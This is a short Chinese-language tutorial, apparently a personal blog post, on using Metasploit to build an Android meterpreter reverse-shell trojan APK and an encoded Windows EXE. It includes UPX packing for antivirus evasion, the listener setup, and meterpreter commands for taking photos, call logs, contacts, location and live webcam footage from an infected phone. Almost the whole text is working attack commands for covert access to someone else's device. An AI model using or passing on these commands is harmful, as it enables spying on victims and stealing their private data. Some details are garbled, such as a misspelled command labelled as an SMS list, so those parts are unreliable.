Metasploit之安卓渗透
过程与之前的生成windows木马的较为相似
1.终端
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.43.80 LPORT=55555 R > test.apk //生成一个安卓木马,导入手机并安装,生成的木马文件在目录下。 msfconsole //打开msf控制台
更新了kali了,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode
kali2.0之后的可以使用以下命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe // -p payload -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 LHOST,LPORT 监听上线的主机IP和端口 -f exe 生成EXE格式
还可以使用UPX加壳,做免杀处理,命令如下
upx -5 /root/Desktop/acn.exe
- 现在怎么生成apk文件,还不太清楚
2.设置好木马的客户端软件
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.80 msf exploit(handler) > set LPORT 55555 msf exploit(handler) > exploit //形成一个等待的会话
3.木马被触发之后,就会得到一个会话
meterpreter > help meterpreter > XXXXX -h //查看帮助 meterpreter > XXXXXX XXXXXX //功能 search -f *.jpg (*.png or *.bmp) //搜索 download 图片名(jpg png bmp) //下载(通过ls查看后即可得到图片名) webcam_snap //手机截图 check_root //检查是否root webcam_stream //手机摄像头监控 dump_calllog //下载电话记录 dump_cuntacts //短信列表 geolocate //获取定位
还有很多命令并没有介绍,通过输入help可以查看有哪些命令可以利用,在相应的命令后面添加上“-h”即可获得对该命令的帮助信息